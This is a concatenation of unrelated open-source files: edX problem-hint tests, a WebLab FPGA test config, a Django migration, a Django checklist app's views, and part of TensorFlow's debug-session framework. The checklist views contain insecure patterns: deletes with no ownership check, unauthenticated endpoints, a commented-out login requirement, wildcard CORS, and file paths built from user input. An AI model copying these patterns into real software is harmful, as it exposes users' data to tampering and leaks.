# B C -> 2 hints
self.problem.capa_module.runtime.track_function.reset_mock()
self.get_hint(u'1_2_1', [u'choice_1', u'choice_2'])
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'hint_label': u'Incorrect',
'module_id': 'i4x://Foo/bar/mock/abc',
'problem_part_id': '1_1',
'choice_all': ['choice_0', 'choice_1', 'choice_2'],
'correctness': False,
'trigger_type': 'single',
'student_answer': [u'choice_1', u'choice_2'],
'hints': [
{'text': 'A false', 'trigger': [{'choice': 'choice_0', 'selected': False}]},
{'text': 'C true', 'trigger': [{'choice': 'choice_2', 'selected': True}]}
],
'question_type': 'choiceresponse'}
)
# A C -> 1 Compound hint
self.problem.capa_module.runtime.track_function.reset_mock()
self.get_hint(u'1_2_1', [u'choice_0', u'choice_2'])
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'hint_label': u'Correct',
'module_id': 'i4x://Foo/bar/mock/abc',
'problem_part_id': '1_1',
'choice_all': ['choice_0', 'choice_1', 'choice_2'],
'correctness': True,
'trigger_type': 'compound',
'student_answer': [u'choice_0', u'choice_2'],
'hints': [
{'text': 'A C Compound',
'trigger': [{'choice': 'choice_0', 'selected': True}, {'choice': 'choice_2', 'selected': True}]}
],
'question_type': 'choiceresponse'}
)
@ddt
class MultpleChoiceHintsTest(HintTest):
"""
    This class consists of a suite of test cases to be run on the multiple choice problem loaded from the fixture XML.
"""
xml = load_fixture('extended_hints_multiple_choice.xml')
problem = new_loncapa_problem(xml)
def test_tracking_log(self):
"""Test that the tracking log comes out right."""
self.problem.capa_module.reset_mock()
self.get_hint(u'1_3_1', u'choice_2')
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'module_id': 'i4x://Foo/bar/mock/abc', 'problem_part_id': '1_2', 'trigger_type': 'single',
'student_answer': [u'choice_2'], 'correctness': False, 'question_type': 'multiplechoiceresponse',
'hint_label': 'OOPS', 'hints': [{'text': 'Apple is a fruit.'}]}
)
@data(
{'problem_id': u'1_2_1', 'choice': u'choice_0',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-text">Mushroom is a fungus, not a fruit.</div></div>'},
{'problem_id': u'1_2_1', 'choice': u'choice_1',
'expected_string': ''},
{'problem_id': u'1_3_1', 'choice': u'choice_1',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Potato is a root vegetable.</div></div>'},
{'problem_id': u'1_2_1', 'choice': u'choice_2',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">OUTSTANDING: </div><div class="hint-text">Apple is indeed a fruit.</div></div>'},
{'problem_id': u'1_3_1', 'choice': u'choice_2',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">OOPS: </div><div class="hint-text">Apple is a fruit.</div></div>'},
{'problem_id': u'1_3_1', 'choice': u'choice_9',
'expected_string': ''},
)
@unpack
def test_multiplechoice_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
@ddt
class MultpleChoiceHintsWithHtmlTest(HintTest):
"""
    This class consists of a suite of test cases to be run on the multiple choice problem loaded from the fixture XML.
"""
xml = load_fixture('extended_hints_multiple_choice_with_html.xml')
problem = new_loncapa_problem(xml)
def test_tracking_log(self):
"""Test that the tracking log comes out right."""
self.problem.capa_module.reset_mock()
self.get_hint(u'1_2_1', u'choice_0')
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'module_id': 'i4x://Foo/bar/mock/abc', 'problem_part_id': '1_1', 'trigger_type': 'single',
'student_answer': [u'choice_0'], 'correctness': False, 'question_type': 'multiplechoiceresponse',
'hint_label': 'Incorrect', 'hints': [{'text': 'Mushroom <img src="#" ale="#"/>is a fungus, not a fruit.'}]}
)
@data(
{'problem_id': u'1_2_1', 'choice': u'choice_0',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">Mushroom <img src="#" ale="#"/>is a fungus, not a fruit.</div></div>'},
{'problem_id': u'1_2_1', 'choice': u'choice_1',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">Potato is <img src="#" ale="#"/> not a fruit.</div></div>'},
{'problem_id': u'1_2_1', 'choice': u'choice_2',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text"><a href="#">Apple</a> is a fruit.</div></div>'}
)
@unpack
def test_multiplechoice_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
@ddt
class DropdownHintsTest(HintTest):
"""
    This class consists of a suite of test cases to be run on the drop down problem loaded from the fixture XML.
"""
xml = load_fixture('extended_hints_dropdown.xml')
problem = new_loncapa_problem(xml)
def test_tracking_log(self):
"""Test that the tracking log comes out right."""
self.problem.capa_module.reset_mock()
self.get_hint(u'1_3_1', u'FACES')
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'module_id': 'i4x://Foo/bar/mock/abc', 'problem_part_id': '1_2', 'trigger_type': 'single',
'student_answer': [u'FACES'], 'correctness': True, 'question_type': 'optionresponse',
'hint_label': 'Correct', 'hints': [{'text': 'With lots of makeup, doncha know?'}]}
)
@data(
{'problem_id': u'1_2_1', 'choice': 'Multiple Choice',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Good Job: </div><div class="hint-text">Yes, multiple choice is the right answer.</div></div>'},
{'problem_id': u'1_2_1', 'choice': 'Text Input',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">No, text input problems do not present options.</div></div>'},
{'problem_id': u'1_2_1', 'choice': 'Numerical Input',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">No, numerical input problems do not present options.</div></div>'},
{'problem_id': u'1_3_1', 'choice': 'FACES',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">With lots of makeup, doncha know?</div></div>'},
{'problem_id': u'1_3_1', 'choice': 'dogs',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">NOPE: </div><div class="hint-text">Not dogs, not cats, not toads</div></div>'},
{'problem_id': u'1_3_1', 'choice': 'wrongo',
'expected_string': ''},
# Regression case where feedback includes answer substring
{'problem_id': u'1_4_1', 'choice': 'AAA',
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">AAABBB1</div></div>'},
{'problem_id': u'1_4_1', 'choice': 'BBB',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">AAABBB2</div></div>'},
{'problem_id': u'1_4_1', 'choice': 'not going to match',
'expected_string': ''},
)
@unpack
def test_dropdown_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
class ErrorConditionsTest(HintTest):
"""
    Erroneous XML should raise an exception.
"""
def test_error_conditions_illegal_element(self):
xml_with_errors = load_fixture('extended_hints_with_errors.xml')
with self.assertRaises(Exception):
new_loncapa_problem(xml_with_errors) # this problem is improperly constructed
| agpl-3.0 |
porduna/weblabdeusto | server/launch/sample_balanced2_concurrent_experiments/main_machine/lab_and_experiment1/experiment2/server_config.py | 968 | 1526 | #!/usr/bin/env python
#-*-*- encoding: utf-8 -*-*-
weblab_xilinx_experiment_xilinx_device = 'FPGA'
weblab_xilinx_experiment_port_number = 1
# This should be something like this:
# import os as _os
# xilinx_home = _os.getenv('XILINX_HOME')
# if xilinx_home == None:
# if _os.name == 'nt':
# xilinx_home = r'C:\Program Files\Xilinx'
# elif _os.name == 'posix':
# xilinx_home = r"/home/nctrun/Xilinx"
#
# if _os.name == 'nt':
# xilinx_impact_full_path = [xilinx_home + r'\bin\nt\impact']
# elif _os.name == 'posix':
# xilinx_impact_full_path = [xilinx_home + r'/bin/lin/impact']
# But for testing we are going to fake it:
xilinx_home = "."
xilinx_impact_full_path = ["python","./tests/unit/weblab/experiment/devices/xilinx_impact/fake_impact.py" ]
xilinx_device_to_program = 'XilinxImpact' # 'JTagBlazer', 'DigilentAdept'
xilinx_device_to_send_commands = 'SerialPort' # 'HttpDevice'
digilent_adept_full_path = ["python","./test/unit/weblab/experiment/devices/digilent_adept/fake_digilent_adept.py" ]
digilent_adept_batch_content = """something with the variable $FILE"""
xilinx_http_device_ip_FPGA = "192.168.50.138"
xilinx_http_device_port_FPGA = 80
xilinx_http_device_app_FPGA = ""
xilinx_batch_content_FPGA = """setMode -bs
setCable -port auto
addDevice -position 1 -file $FILE
Program -p 1
exit
"""
# Though it is not really an FPGA, the webcam URL variable name depends on
# the device specified above.
fpga_webcam_url = '''https://www.weblab.deusto.es/webcam/fpga0/image.jpg'''
| bsd-2-clause |
kartta-labs/noter-backend | noter_backend/main/migrations/0001_initial.py | 1 | 2952 | # Generated by Django 3.0.8 on 2020-08-13 19:20
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import main.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BasicUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('display_name', models.CharField(blank=True, default='', max_length=100)),
('email', models.EmailField(max_length=512, unique=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, default='', max_length=100)),
('labels_json', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='projects_by_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uploaded_at', models.DateTimeField(auto_now_add=True)),
('title', models.CharField(blank=True, default='', max_length=100)),
('description', models.TextField(blank=True, default='')),
('image', models.ImageField(upload_to=main.models.generate_uuid_filename, verbose_name='Image')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images_by_user', to=settings.AUTH_USER_MODEL)),
('part_of_project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images_in_project', to='main.Project')),
],
),
migrations.CreateModel(
name='AnnotationsJson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content_json', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('on_image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='annotations_by_image', to='main.Image')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='annotations_by_user', to=settings.AUTH_USER_MODEL)),
],
),
]
| apache-2.0 |
timothyclemans/checklistsforglass | checklistsforglass/views.py | 1 | 13909 | from django.shortcuts import render
from django.shortcuts import render_to_response
from django.db.models.loading import get_model
from django.http import HttpResponse, HttpResponseRedirect
from models import Checklist, ChecklistV2, ChecklistElement, Device, UnregisteredDevice, Data, AuditTrail
from django.contrib.auth.models import User
import json
from django.template import RequestContext
import traceback
import sys
from django.contrib.auth.decorators import login_required
import re
from django.utils.text import compress_string
from django.utils.cache import patch_vary_headers
from django import http
try:
import settings
XS_SHARING_ALLOWED_ORIGINS = settings.XS_SHARING_ALLOWED_ORIGINS
XS_SHARING_ALLOWED_METHODS = settings.XS_SHARING_ALLOWED_METHODS
except:
XS_SHARING_ALLOWED_ORIGINS = '*'
XS_SHARING_ALLOWED_METHODS = ['POST','GET','OPTIONS', 'PUT', 'DELETE']
class XsSharing(object):
"""
    This middleware enables cross-domain XHR by setting CORS response headers,
    for example:
    Access-Control-Allow-Origin: http://foo.example
    Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
"""
def process_request(self, request):
if 'HTTP_ACCESS_CONTROL_REQUEST_METHOD' in request.META:
response = http.HttpResponse()
response['Access-Control-Allow-Origin'] = XS_SHARING_ALLOWED_ORIGINS
response['Access-Control-Allow-Methods'] = ",".join( XS_SHARING_ALLOWED_METHODS )
return response
return None
def process_response(self, request, response):
# Avoid unnecessary work
if response.has_header('Access-Control-Allow-Origin'):
return response
response['Access-Control-Allow-Origin'] = XS_SHARING_ALLOWED_ORIGINS
response['Access-Control-Allow-Methods'] = ",".join( XS_SHARING_ALLOWED_METHODS )
return response
class ProcessExceptionMiddleware(object):
def process_exception(self, request, exception):
        print exception  # or log, or whatever
        # print the full traceback as well
        print '\n'.join(traceback.format_exception(*sys.exc_info()))
def home(request):
if request.user.is_authenticated():
context = {'user': request.user, 'checklists_user_created': Checklist.objects.filter(author=request.user), 'checklists_user_createdV2': ChecklistV2.objects.filter(author=request.user)}
else:
context = {}
return render_to_response("home.html", context)
def get_full_json(request):
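    # Inline any linked checklists into the posted JSON. For example
    # (hypothetical data): if checklist 7 stores '[{"type":"item","text":"a"}]',
    # then '[{"type":"link","checklist_id":7}]' expands to that stored list.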
the_json = request.POST['json']
matches = re.findall('{"type":"link","checklist_id":\d+}', the_json)
for match in matches:
m = re.search('{"type":"link","checklist_id":(?P<id>\d+)}', match)
checklist = ChecklistV2.objects.get(id=int(m.group('id')))
the_json = the_json.replace(match, checklist.json[1:-1])
return HttpResponse(the_json)
def get_full_checklist(request, checklist_id):
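    # Like get_full_json, but loads the checklist by id and also strips the
    # null/empty placeholders the editor can leave behind in the stored JSON.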
checklist = ChecklistV2.objects.get(id=checklist_id)
the_json = checklist.json
matches = re.findall('{"type":"link","checklist_id":\d+}', the_json)
for match in matches:
m = re.search('{"type":"link","checklist_id":(?P<id>\d+)}', match)
checklist = ChecklistV2.objects.get(id=int(m.group('id')))
the_json = the_json.replace(match, checklist.json[1:-1])
the_json = the_json.replace("null", "")
the_json = the_json.replace("[,", "[")
the_json = the_json.replace(",]", "]")
the_json = the_json.replace(",,", ",")
return HttpResponse(the_json, content_type="application/json")
#@login_required
def audit_trail(request, data_id):
data = json.loads(Data.objects.get(id=data_id).data)
context = RequestContext(request, {'data': data})
return render_to_response('audit_trail.html', context)
def audit_trails(request):
audit_trails = AuditTrail.objects.filter(user=request.user)
context = RequestContext(request, {'audit_trails': audit_trails})
return render_to_response('audit_trails.html', context)
@login_required
def edit_checklist(request, checklist_id):
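    # Accepts two POST formats: a 'mass' newline-separated list of items, or
    # per-element 'text_*' fields that are matched with uploaded image files
    # sharing the same numeric suffix.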
if request.POST:
print request.FILES
print request.POST
checklist = Checklist.objects.get(id=checklist_id)
checklist.name = request.POST['name']
checklist.delete_elements()
matches = {}
if 'mass' in request.POST:
print request.POST['mass']
for i, item in enumerate(request.POST['mass'].split('\n')):
print i, item
checklist_element = ChecklistElement(checklist=checklist, text=item.strip(), order=i)
checklist_element.save()
else:
for i, element in enumerate(sorted([j for j in request.POST.keys() if j.startswith('text_')])):
checklist_element = ChecklistElement(checklist=checklist, text=request.POST[element], order=i)
checklist_element.save()
matches[element[5:]] = checklist_element.id
print checklist.name
for i in request.FILES:
f = request.FILES[i]
ext = f.name[f.name.index('.')+1:]
checklist_element = ChecklistElement.objects.get(id=matches[i[6:]])
checklist_element.image = f
checklist_element.save()
#with open('/home/tim/checklistsforglass/checklist_images/%s.%s' % (matches[i[6:]], ext), 'wb+') as destination:
# for chunk in f.chunks():
# destination.write(chunk)
checklist.save()
context = RequestContext(request, {'checklist': Checklist.objects.get(id=checklist_id)})
return render_to_response("edit_checklist.html", context)
def save_image(request, checklist_id):
if request.POST:
        print request.FILES
        f = request.FILES['file']
        file_name = request.POST['file_name'].lower().replace(' ', '_')
        # open in binary mode so the JPEG bytes are written unmodified
        with open('/home/tim/checklistsforglass/media/images/%s_%s.jpg' % (checklist_id, file_name), 'wb') as imagef:
            imagef.write(f.read())
return HttpResponseRedirect('/edit_checklistV2/%s/' % (checklist_id))
else:
context = RequestContext(request, {})
return render_to_response('save_image.html', context)
#@login_required
def edit_checklistV2(request, checklist_id):
if request.POST:
print request.FILES
print request.POST
checklist = ChecklistV2.objects.get(id=checklist_id)
        if request.user != checklist.author:
return HttpResponse('not the author')
checklist.name = request.POST['name']
checklist.json = request.POST['json']
matches = {}
checklist.save()
if request.user.is_authenticated():
from os import listdir
from os.path import isfile, join
images = [ f for f in listdir('/home/tim/checklistsforglass/media/images/') if isfile(join('/home/tim/checklistsforglass/media/images/',f)) if f.startswith(str(checklist_id)) ]
context = RequestContext(request, {'checklist': ChecklistV2.objects.get(id=checklist_id), 'page': 'V2', 'checklists': ChecklistV2.objects.filter(author=request.user), 'images': images})
else:
context = RequestContext(request, {'checklist': ChecklistV2.objects.get(id=checklist_id), 'page': 'V2', 'checklists': ChecklistV2.objects.all(),})
return render_to_response("edit_checklistV2.html", context)
@login_required
def create_checklistV2(request):
print 'Create checklist V2: '+str(request.POST)
if request.POST:
print request.FILES
print request.POST
checklist = ChecklistV2(name=request.POST['name'], author=request.user, json=request.POST['json'])
checklist.save()
return HttpResponse(str(checklist.id))
context = RequestContext(request, {'action': 'create', 'page': 'V2', 'checklists': ChecklistV2.objects.filter(author=request.user),})
return render_to_response("edit_checklistV2.html", context)
@login_required
def create_checklist(request):
if request.POST:
print request.FILES
print request.POST
checklist = Checklist(name=request.POST['name'], author=request.user)
checklist.save()
if 'mass' in request.POST:
print request.POST['mass']
for i, item in enumerate(request.POST['mass'].split('\n')):
print i, item
checklist_element = ChecklistElement(checklist=checklist, text=item.strip(), order=i)
checklist_element.save()
else:
matches = {}
for i, element in enumerate(sorted([j for j in request.POST.keys() if j.startswith('text_')])):
checklist_element = ChecklistElement(checklist=checklist, text=request.POST[element], order=i)
checklist_element.save()
matches[element[5:]] = checklist_element.id
print checklist.name
for i in request.FILES:
f = request.FILES[i]
ext = f.name[f.name.index('.')+1:]
checklist_element = ChecklistElement.objects.get(id=matches[i[6:]])
checklist_element.image = f
checklist_element.save()
checklist.save()
for device in Device.objects.filter(user=request.user):
device.checklists.add(checklist)
context = RequestContext(request, {'action': 'create'})
return render_to_response("edit_checklist.html", context)
@login_required
def delete_checklist(request, checklist_id):
checklist = Checklist.objects.get(id=checklist_id)
checklist.delete()
return HttpResponse('')
@login_required
def delete_checklistV2(request, checklist_id):
checklist = ChecklistV2.objects.get(id=checklist_id)
checklist.delete()
return HttpResponse('')
def is_registered(request, serial_number):
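    # Side effect: the first time an unknown serial number is seen it is
    # recorded as an UnregisteredDevice so a user can later claim it.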
    answer = serial_number in [i.serial_number for i in Device.objects.all()]
    if not answer and serial_number not in [i.serial_number for i in UnregisteredDevice.objects.all()]:
unregistered_device = UnregisteredDevice(serial_number=serial_number)
unregistered_device.save()
return HttpResponse(answer)
@login_required
def install(request):
context = {}
return render_to_response("install.html", context)
def unregistered_devices(request):
devices = json.dumps([i.serial_number for i in UnregisteredDevice.objects.all()])
return HttpResponse(devices, content_type="application/json")
def register_device(request, serial_number):
device = Device(serial_number=serial_number, user=request.user)
device.save()
unregistered_device = UnregisteredDevice.objects.get(serial_number=serial_number)
unregistered_device.delete()
return HttpResponse('')
def get_users_checklists(request, user_id):
checklists = {}
for checklist in ChecklistV2.objects.filter(author__id=user_id):
checklists[checklist.name] = checklist.id
devices = json.dumps(checklists)
return HttpResponse(devices, content_type="application/json")
def get_all_checklists(request):
checklists = {}
for checklist in ChecklistV2.objects.all():
checklists[checklist.name] = checklist.id
devices = json.dumps(checklists)
return HttpResponse(devices, content_type="application/json")
def get_checklists(request, serial_number):
device = Device.objects.get(serial_number=serial_number)
device.checklists.all()
devices = json.dumps([{'name': i.name, 'elements': i.get_elements()} for i in device.checklists.all()])
return HttpResponse(devices, content_type="application/json")
def export(request):
checklists = ChecklistV2.objects.filter(author=request.user)
cl = []
for checklist in checklists:
d = {}
d['name'] = checklist.name
d['description'] = checklist.description
d['video_url'] = checklist.video_url
d['json'] = checklist.json
cl.append(d)
return HttpResponse(json.dumps(cl), content_type="application/json")
def save_data(request):
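    # Persist a completed-checklist run. Any 'take_photo' steps carry a
    # base64-encoded image, which is written to disk and replaced in the
    # stored JSON by its filename.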
data = Data(data=request.POST['data'])
data.save()
    i = 0
print len(json.loads(data.data))
new_data = []
for item in json.loads(data.data):
print item
if item['type'] == 'take_photo':
            # decode the base64 payload in-process rather than shelling out,
            # avoiding quoting problems with arbitrary uploaded data
            import base64
            with open('/home/tim/checklistsforglass/media/images/%s_%s.png' % (data.id, i), 'wb') as photo_file:
                photo_file.write(base64.b64decode(item['photo']))
item['photo'] = '%s_%s.png' % (data.id, i)
i += 1
new_data.append(item)
data.data = json.dumps(new_data)
data.save()
if 'user_id' in request.POST:
audit_trail = AuditTrail(data=data, user=User.objects.get(id=request.POST['user_id']), checklist=ChecklistV2.objects.get(id=request.POST['checklist_id']))
audit_trail.save()
return HttpResponse('saved')
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.http import HttpResponse, HttpResponseRedirect
from django.views.generic.base import View
from social_auth.exceptions import AuthFailed
from social_auth.views import complete
class AuthComplete(View):
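    # Wraps social_auth's complete() view so an AuthFailed (e.g. a Google
    # Apps domain that is not authorized) shows a friendly message instead
    # of a server error.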
def get(self, request, *args, **kwargs):
backend = kwargs.pop('backend')
try:
return complete(request, backend, *args, **kwargs)
except AuthFailed:
messages.error(request, "Your Google Apps domain isn't authorized for this app")
return HttpResponseRedirect(reverse('home'))
class LoginError(View):
def get(self, request, *args, **kwargs):
return HttpResponse(status=401)
| apache-2.0 |
koobonil/Boss2D | Boss2D/addon/tensorflow-1.2.1_for_boss/tensorflow/python/debug/wrappers/framework.py | 13 | 29952 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Framework of debug wrapper sessions.
A debug wrapper session is a wrapper around a TensorFlow Python Session.
The wrapper preserves the Session interface, most importantly the run() method,
while providing abilities to:
a) Intercept a run() call to a wrapped session and insert debug tensor watches
according to externally-specified debug URLs.
b) Release control to an external (i.e., non-Session) object before and after
the run() call, so that the external object can perform actions such as
launching a UI to let users inspect the intermediate tensors and partition
graphs from the run() call.
c) (To be implemented) Intercept a run() call and give control to DebugStepper
to let it perform stepping / continuing-to actions on the graph.
d) (To be implemented in a future CL) Enter an instruction loop to let an
external object (e.g., remote client) launch run() and cont() calls
remotely.
*** The lifetime of a debug wrapper session: ***
1) The wrapper session is created by calling the constructor with a
wrapped (normal) session as the argument:
wrapper = FooDebugWrapperSession(sess)
wherein FooDebugWrapperSession is a concrete subclass implementing the
abstract BaseDebugWrapperSession class below.
2) Near the end of the constructor call, the on_session_init() callback is
invoked, with a OnSessionInitRequest object as the argument. The object
carries the wrapped (normal) session object.
3) The callback handles the request and returns an OnSessionInitResponse
object with an action field, directing the wrapper session what to do next.
If the action field in the OnSessionInitResponse is PROCEED, the constructor
returns. Control is released back to the caller of the constructor, which can
invoke run() method of wrapper session with the same syntax as a non-wrapped
session, e.g.,:
wrapper.run(fetches, feed_dict=feeds, options=run_options)
Below, A1 - A2 is the lifetime of a wrapper run() call if the action is
PROCEED:
A1) Right at the start of each run() call, the on_run_start() callback is
invoked, with an OnRunStartRequest object carrying information such as
the fetches, the feed dict, the run options and run metadata used in
this run call, along with a count of how many run calls has occurred
on this wrapper session. The callback then returns an OnRunStartResponse
object, of which the action field directs what the wrapper session
actually will do of the run() call.
If the action is DEBUG_RUN, a debugged (tensor-watched) run will ensue,
with the debug URLs supplied in the debug_urls field of the response.
These can be file:// or grpc:// URLs, for example.
If the action is NON_DEBUG_RUN, a non-debug (normal) run will ensue.
If the action is INVOKE_STEPPER, no run() call will be issued to the
wrapped session. But instead, a DebugStepper (i.e., "continuation
debugger") will be used to perform stepping / continue-to actions on
the graph.
TODO(cais): The event loop for the DebugStepper will request additional
callbacks including on_cont_start() and on_cont_end(). Add those.
A2) Right before the run() returns, the on_run_end() callback is invoked,
with an OnRunEndRequest object as the argument, which carries information
including the actual action performed in the wrapper run() call and the
run_metadata from the run() call.
However, if the action field in OnSessionInitResponse is
REMOTE_INSTR_LOOP, the constructor will automatically invoke an instruction loop
that gives control to a remote caller.
In the remote instruction loop, the following steps will happen:
B1) Callback on_instr_start() is invoked. The callback will return an
OnInstrStartResponse object with an action field which can order one of
the following actions:
i) a run() call with fetches, feeds and debug_urls specified.
ii) a DebugStepper cont() call with target specified.
iii) value overrides in the cached tensors from the DebugStepper.
iv) exit the instruction loop.
B2) The wrapper session carries out the action specified above.
B3) If still in the instruction loop, the wrapper session invokes the
on_instr_end() callback. After the on_instr_end() callback returns, jump
back to B1.
TODO(cais): Implement the instruction loop in B1 - B3.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import re
import threading
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.debug.lib import stepper
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
# Helper function.
def _check_type(obj, expected_type):
"""Check if an object is of the expected type.
Args:
obj: The object being checked.
expected_type: (type) The expected type of obj.
Raises:
TypeError: If obj is not an instance of expected_type.
"""
if not isinstance(obj, expected_type):
raise TypeError("Expected type %s; got type %s" %
(expected_type, type(obj)))
class OnSessionInitRequest(object):
"""Request to an on-session-init callback.
This callback is invoked during the __init__ call to a debug-wrapper session.
"""
def __init__(self, sess):
"""Constructor.
Args:
sess: A tensorflow Session object.
"""
_check_type(sess, session.BaseSession)
self.session = sess
class OnSessionInitAction(object):
"""Enum-like values for possible action to take on session init."""
# Proceed, without special actions, in the wrapper session initialization.
# What action the wrapper session performs next is determined by the caller
# of the wrapper session. E.g., it can call run().
PROCEED = "proceed"
# Instead of letting the caller of the wrapper session determine what actions
# the wrapper session will perform next, enter a loop to receive instructions
# from a remote client.
# For example, TensorBoard visual debugger can use this action so that it can
# launch session.run() calls remotely.
REMOTE_INSTR_LOOP = "remote_instr_loop"
class OnSessionInitResponse(object):
"""Response from an on-session-init callback."""
def __init__(self, action):
"""Constructor.
Args:
action: (`OnSessionInitAction`) Debugger action to take on session init.
"""
_check_type(action, str)
self.action = action
class OnRunStartRequest(object):
"""Request to an on-run-start callback.
This callback is invoked during a run() call of the debug-wrapper
session, immediately after the run() call counter is incremented.
"""
def __init__(self, fetches, feed_dict, run_options, run_metadata,
run_call_count):
"""Constructor of `OnRunStartRequest`.
Args:
fetches: Fetch targets of the run() call.
feed_dict: The feed dictionary to the run() call.
run_options: RunOptions input to the run() call.
run_metadata: RunMetadata input to the run() call.
The above four arguments are identical to the input arguments to the
run() method of a non-wrapped TensorFlow session.
run_call_count: 1-based count of how many run calls (including this one)
have been invoked.
"""
self.fetches = fetches
self.feed_dict = feed_dict
self.run_options = run_options
self.run_metadata = run_metadata
self.run_call_count = run_call_count
class OnRunStartAction(object):
"""Enum-like values for possible action to take on start of a run() call."""
# Run once with debug tensor-watching.
DEBUG_RUN = "debug_run"
# Run once with profiler.
PROFILE_RUN = "profile_run"
# Run without debug tensor-watching.
NON_DEBUG_RUN = "non_debug_run"
# Instead of running the fetches as a whole, as would normally happen, invoke
# the (to-be-implemented) debug stepper.
# TODO(cais): Remove "to-be-implemented".
INVOKE_STEPPER = "invoke_stepper"
class OnRunStartResponse(object):
"""Request from an on-run-start callback.
The caller of the callback can use this response object to specify what
action the debug-wrapper session actually takes on the run() call.
"""
def __init__(self,
action,
debug_urls,
debug_ops="DebugIdentity",
node_name_regex_whitelist=None,
op_type_regex_whitelist=None,
tensor_dtype_regex_whitelist=None,
tolerate_debug_op_creation_failures=False):
"""Constructor of `OnRunStartResponse`.
Args:
action: (`OnRunStartAction`) the action actually taken by the wrapped
session for the run() call.
debug_urls: (`list` of `str`) debug_urls used in watching the tensors
during the run() call.
debug_ops: (`str` or `list` of `str`) Debug op(s) to be used by the
debugger.
node_name_regex_whitelist: Regular-expression whitelist for node
name.
op_type_regex_whitelist: Regular-expression whitelist for op type.
tensor_dtype_regex_whitelist: Regular-expression whitelist for tensor
dtype.
tolerate_debug_op_creation_failures: Whether debug op creation failures
are to be tolerated.
"""
_check_type(action, str)
self.action = action
_check_type(debug_urls, list)
self.debug_urls = debug_urls
self.debug_ops = debug_ops
self.node_name_regex_whitelist = node_name_regex_whitelist
self.op_type_regex_whitelist = op_type_regex_whitelist
self.tensor_dtype_regex_whitelist = tensor_dtype_regex_whitelist
self.tolerate_debug_op_creation_failures = (
tolerate_debug_op_creation_failures)
class OnRunEndRequest(object):
"""Request to an on-run-end callback.
The callback is invoked immediately before the wrapped run() call ends.
"""
def __init__(self,
performed_action,
run_metadata=None,
client_graph_def=None,
tf_error=None):
"""Constructor for `OnRunEndRequest`.
Args:
performed_action: (`OnRunStartAction`) Actually-performed action by the
debug-wrapper session.
run_metadata: run_metadata output from the run() call (if any).
client_graph_def: (GraphDef) GraphDef from the client side, i.e., from
the python front end of TensorFlow. Can be obtained with
session.graph.as_graph_def().
tf_error: (errors.OpError subtypes) TensorFlow OpError that occurred
during the run (if any).
"""
_check_type(performed_action, str)
self.performed_action = performed_action
if run_metadata is not None:
_check_type(run_metadata, config_pb2.RunMetadata)
self.run_metadata = run_metadata
self.client_graph_def = client_graph_def
self.tf_error = tf_error
class OnRunEndResponse(object):
"""Response from an on-run-end callback."""
def __init__(self):
# Currently only a placeholder.
pass
